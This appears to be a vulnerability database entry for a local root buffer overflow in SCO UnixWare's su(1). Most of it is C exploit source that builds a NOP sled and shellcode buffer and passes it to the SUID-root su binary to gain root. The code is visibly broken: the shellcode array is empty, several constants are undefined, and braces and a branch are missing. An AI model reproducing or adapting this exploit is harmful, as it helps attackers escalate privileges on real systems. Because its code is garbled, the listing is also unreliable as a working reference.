SCO Unixware 2.1/7.0/7.0.1/7.1/7.1.1 su(1) Buffer Overflow Vulnerability

ID SSV:73559
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00


No description provided by source.


Certain versions of Unixware ship with a version of su(1) which is vulnerable to a buffer overflow attack. This attack is possible because su(1) fails to sanity check user supplied data, in this instance a username supplied on the command line. Because su(1) is SUID root this attack may result in root privileges. 

// UnixWare7 /usr/bin/su local, K2, revisited Oct-30-1999
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

char shell[] =

const char x86_nop=0x90;
long nop,esp;
long offset=DEFOFF;
char buffer[SIZE];

long get_esp() { __asm__("movl %esp,%eax"); }

int main (int argc, char *argv[])
    register int i;

    if (argc > 1) offset += strtol(argv[1], NULL, 0);
    if (argc > 2) nop += strtoul(argv[2], NULL, 0);
        nop = NOPDEF;
    esp = get_esp();

    memset(buffer, x86_nop, SIZE);
    memcpy(buffer+nop, shell, strlen(shell));

    for (i = nop+strlen(shell); i < SIZE-4; i += 4)
        *((int *) &buffer[i]) = esp+offset;

    printf("offset = [0x%x]\n",esp+offset);
    execl("/usr/bin/su", "su", buffer, NULL);

    printf("exec failed!\n");
    return 0;